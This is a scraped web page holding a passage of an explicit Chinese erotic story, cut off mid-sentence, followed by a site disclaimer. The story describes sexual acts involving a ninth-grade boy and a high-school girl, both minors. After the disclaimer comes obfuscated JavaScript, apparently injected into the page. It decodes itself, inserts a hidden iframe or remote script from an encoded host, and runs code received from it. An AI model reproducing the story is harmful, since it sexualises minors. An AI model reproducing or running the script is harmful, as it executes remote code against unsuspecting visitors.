龙涛在西城区的一所三类校里升上了初三。比起录取分数线并不低的职业高中部,全都是由附近的小学大拨搓来的初中部更有战斗力。一群从各个小学凑来的坏孩子聚在一起,加上其中几个人还有已经在附近打出了名气的亲哥哥,整所学校可以说是被他们统治的。一天午休时,侯龙涛和两个同学坐在三楼的楼梯口上神侃,刚说到厕所去抽根儿烟,就看见一个高中的女生从楼下走了上来,圆圆的脸,算是个中上等货色,尤其是那对儿乃子,在她这个年龄段的女孩儿里可以说是少见的大。那个女生从三人中间穿过去,有意无意的朝侯龙涛抛了个媚眼儿。“哟呵。”三个小流氓不约而同的回过头,看着她一扭一扭的上楼。“这妞儿叫绍嘉蔚,高二的,s的很。”一个同学说。“你怎么知道她s啊?”“丫那一年里换了五个男朋友,只要长得帅就行,我看她对你丫有意思,还不上?”“对这种女人没兴趣。”“c,别你妈装有档次了,我看你丫是怕被她男朋友勀吧。”“去你妈的,我怕?”年少的侯龙涛可受不了激,“你们丫在这儿等着,我这就去看看她的内k是什么色儿。”说着就向楼上跑去。绍嘉蔚并没有走远,三个小流氓的对话她全听见了,“对我不感兴趣?我就非让你感兴趣不可。”想到这儿,干脆不走了,在四层的楼梯口儿弯下腰,轻捋着脚腕儿处的丝袜,其实根本没有皱褶。侯龙涛追上来了,刚一过三楼半的转角就看到一个包裹在职高制服校裙下的丰满p股撅在上面。那还客气什么,紧走两步,一把把裙子撩了起来。r色的裤袜下是一条浅红色的半兜臀内k,有一半儿的p股都露在外面,曲线很好。为了让后面的男人看清楚一点儿,绍嘉蔚等了四、五秒才把裙子按了下去,回过身来,佯装气怒的一瞪眼,“流氓,你干什么?”说着就挥起手要打侯龙涛,看上去好像很用力,但速度却不快,一下儿就被侯龙涛抓住了手腕儿。“行了,咱们别耽误时间,放学一起看场电影儿吧。”侯龙涛嬉皮笑脸的说,察觉到了女孩儿不太正常的反应,知道她确实是对自己有点儿意思,虽然不喜欢这种sx,但又不是要她做女朋友,不玩儿白不玩儿,况且高年级的女生对他还是有点儿吸引力的。绍嘉蔚一点儿也不含糊,“行啊,放了学我在后门儿等你。”说完就想走。“诶,等会儿。”“干吗?”“先给点儿定钱。”侯龙涛在她的p股上捏了捏。“臭德行。”女孩儿妖媚的一笑,打了他一下儿,更像是在他胸口摸了一把。下午放学后,两人来到西单路口西北角的电影儿院(好像已经被拆了),因为是5:00的那一场,上座率很低,偌大的电影儿院里只有不到一百人。“好啊,好啊。”坐在最后一排的侯龙涛心中暗想,“等一关灯,我可就有的玩儿了。”绍嘉蔚把头枕在男孩儿的肩膀上,伸手在他胸口轻柔的摩挲着,“哼,瘦骨嶙峋的,还是个小孩儿呢。”侯龙涛那会儿确实是还没长得太开呢,但也不爱听这话啊,“你不瘦?让我摸摸你有多少胸肌。”冲着女孩儿的胸部就抓了过去。结果是手上挨了一巴掌,“瞧你那急色样,等关了灯啊。”绍嘉蔚抱住他的一条胳膊,“不过你的肩膀儿倒是挺宽的,以后一定很有型儿,又有一副斯文的骗人外表,八成儿会变成个花儿匠。”谁又知道她的预言会真的成为现实呢?在两遍铃声过后,电影儿院里的灯光慢慢暗了下来,直到完全的黑暗。还没等男孩儿有所行动,绍嘉蔚的嘴唇已经压住了他的嘴巴,津y顺着伸入他口中的舌头流了过来,这妞儿还真是s的很。侯龙涛哪儿能让她占了上风,又把她压回椅子上,左手从后面搂着她的左肩,右手将她的校裙向上拽,直到她的大腿都露了出来。一边儿接吻,一边儿隔着裤袜揉摸女人大腿和p股的滋味儿真是不错。手掌盖住女孩儿的,一通用力的按压,立刻感到有湿气透了出来。揪住裤袜的裆部向外一拉,“嘶”的一声轻响,薄薄的尼龙就被撕裂了。“唉呀,你要死了?我这是新买…啊…嗯…”绍嘉蔚还没抱怨完,男孩儿的手指已经拨开她的内k,痛痛快快的c入了她y水儿泛滥的y门。女孩儿赶忙咬住自己衬衫的袖口,以免叫出声儿来。侯龙涛解开她的扣子,左手探入她的r罩里,嫩嫩的乃子又圆又大,一只手勉强能掌握,比自己女朋友的好玩儿多了。就这样,摸r的同时,在她的x里抠挖了半个多小时,算是把这s娘儿们弄爽了。男孩儿坐正身子,把胀大的老二掏了出来,左手一揽绍嘉蔚的后脑,向自己的裆部压来。“哎,你干嘛啊?”女孩儿挣脱了他的手。“干嘛?让你给我口儿一管儿啊。”“去你的,多脏啊。”“嗨,你爽了也别让我这么空着啊。”“好了好了,”绍嘉蔚把右手从他腰后伸出来,握住yj,“哇,这么硬啊,我给你手y好了。”侯龙涛闭起眼,左手绕过女孩儿的脖子,从领口伸进她的衣服里,抓住她的左r,“女孩儿的手就是软乎,来吧。”绍嘉蔚左手揉着他的g丸,右手快速捋动他的包皮。侯龙涛捏乃子的力量越来越大,当s精的一刻,干脆拼命掐住她的茹头,疼得女孩儿一口咬住他的衣服,还带上了一小块儿r。第二天又是午休时,教室里只有侯龙涛和另一个男生在偷偷抽烟,因为后门上有一个供老师观察教室里情况的小开口儿,两人全是靠墙坐着。突然前门被推开了,一个女生的脑袋探了进来,正是绍嘉蔚,“喂,龙涛,出来,我跟你说点儿事儿。”“我c,是你啊,吓死我了。”侯龙涛抚了抚胸口,又转向那个男生,“你大爷,你丫没把门锁上啊?”“c,我还以为你他妈锁了呢。”“得得得。”侯龙涛冲绍嘉蔚招了招手,“进来吧。”当女孩儿走到身边时,一把抱住她,将她按坐在自己腿上,“什么事儿啊?”手直接就伸进她的校裙里,在丝袜外露出的大腿上摸着。“你别闹了,真是的。”绍嘉蔚瞟了一眼在边儿的另一个男孩儿。“嗨,大哥,出去看会儿门儿行吗?没看见我这儿要办事儿吗?”“瞧你丫那个色模样。”那个男生虽然嘴里骂着,但还是起身出去了,都是哥们儿,这种互相放哨的事儿常干。门儿一关上,侯龙涛就要解女孩儿衬衫领子上的红丝带。“哎,等会儿。”绍嘉蔚一晃身子,把男孩儿的手甩开,“昨天我们班里有人看见咱俩一起进电影儿院,告诉我男朋友
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}